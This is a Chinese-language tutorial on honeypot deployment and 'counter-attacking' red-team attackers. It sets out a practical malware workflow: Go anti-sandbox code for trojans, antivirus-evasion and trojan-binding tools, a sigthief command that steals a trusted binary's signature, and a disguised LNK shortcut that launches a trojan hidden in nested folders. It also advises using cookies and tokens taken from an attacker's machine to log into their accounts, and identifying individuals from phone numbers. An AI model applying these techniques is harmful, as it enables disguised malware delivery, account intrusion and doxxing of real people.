【溯源反制】自搭建蜜罐到反制攻击队
字数 1184 2025-08-06 08:35:00
蜜罐搭建与溯源反制技术详解
前言
溯源反制是红蓝对抗中的关键环节,通过精心设计的蜜罐系统可以有效地捕获攻击者信息并实现反制。本文将从蜜罐部署、溯源方法和反制技术三个维度进行全面讲解。
蜜罐部署策略
环境搭建要点
-
高仿真虚拟环境:
- 避免使用厂商云蜜罐(特征明显易被识别)
- 推荐使用真实漏洞环境(如致远OA等常见系统)
- 保留nday漏洞方便攻击者利用
-
部署注意事项:
- 必须提前向裁判/上级报备
- 蜜罐需单独隔离防止横向扩散
- 域名命名使用常见字典词(demo、crm等)
- 可通过WAF重定向加速测绘平台收录
-
云服务器准备:
- 镜像导入需安装特定驱动(如腾讯云文档所述)
- 确保系统运行流畅不卡顿
诱饵设计技巧
-
文件诱饵选择:
- 内部密码本
- VPN客户端程序
- 公司通讯录
- 敏感文档
-
增加可信度方法:
- 配套使用说明文档
- 合理的文件命名和存放路径
- 设置上线提醒机制(参考相关技术文章)
溯源技术详解
常规溯源流程
-
IP信息收集:
- 从防火墙/态势感知获取攻击IP
- 使用EHole等工具进行指纹识别
- 检查是否绑定域名(国内域名需备案)
-
WHOIS查询:
- 获取注册人姓名和联系方式
- 交叉验证其他平台信息
-
资产关联分析:
- 检查IP是否运行扫描器/攻击平台
- 查找关联的技术博客/GitHub等
实战溯源案例
-
浏览器历史记录分析:
- 查找用户名/手机号等个人信息
- 通过手机号反查身份信息
- 关联学校/公司信息确认身份
-
配置文件提取:
- 获取各类系统的cookie/token
- 利用这些凭证登录攻击者账户
- 获取百度ID等技术账号
-
考试/认证信息:
- 查找CISP-PTE等认证文件
- 确认攻击者技术背景
-
反钓鱼技巧:
- 使用热点+虚拟机模拟真实环境
- 放置精心设计的反制文件
- 配合攻击者表演获取信任
反制技术实现
木马免杀技术
-
推荐项目:
- GobypassAV-shellcode(过国内主流杀软)
- SysHttpHookSleep(优质免杀方案)
-
反沙箱技术:
// 检测桌面文件数量 func desktop() { desktopPath, err := os.UserHomeDir() if err != nil { return } desktopFiles, err := ioutil.ReadDir(filepath.Join(desktopPath, "Desktop")) if err != nil { return } fileCount := len(desktopFiles) if fileCount < 10 { os.Exit(0) } } // 检测进程名一致性 func process() { executablePath, err := os.Executable() if err != nil { return } sourceFilename := filepath.Base(executablePath) processName := filepath.Base(os.Args[0]) if !strings.EqualFold(sourceFilename, processName) { os.Exit(0) } }
资源伪装技术
-
图标替换工具:
- BeCyIconGrabberPortable(图标提取)
- Resource Hacker(图标替换)
- 360QVM_bypass(批量生成免杀马)
-
签名伪造:
python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe- 使用可信文件的签名
- 通过TrustAsia等平台获取合法签名
木马捆绑技术
-
推荐工具:
- Bundler-bypass
- GoFileBinder
-
使用注意:
- 保持exe文件在命令中的顺序
- 使用Go 1.17版本(1.18可能失败)
- 同时释放正常文件降低怀疑
LNK文件制作
-
文件结构设计:
[可见层] ├── 快捷方式.lnk └── [隐藏文件夹]_MACOS_ └── [隐藏子文件夹]__MACOS__ └── [隐藏子文件夹]__MACOS__ └── [隐藏子文件夹]__MACOS1__ └── 真实木马.exe -
隐藏属性设置:
attrib +s +h +r C:\Users\Public\xxx.exe -
快捷方式配置:
%windir%\system32\cmd.exe /c start .\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS1\_\_\\xxx.doc && C:\Windows\explorer.exe ".\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS\_\_\\.\_\_MACOS1\_\_\\xxx.exe"
总结
蜜罐反制是系统工程,需要:
- 精心设计高仿真环境
- 准备多种反制技术方案
- 耐心等待攻击者上钩
- 快速准确的溯源分析能力
通过本文介绍的技术组合,蓝队可以在防守中实现有效反制,为防守方争取主动权。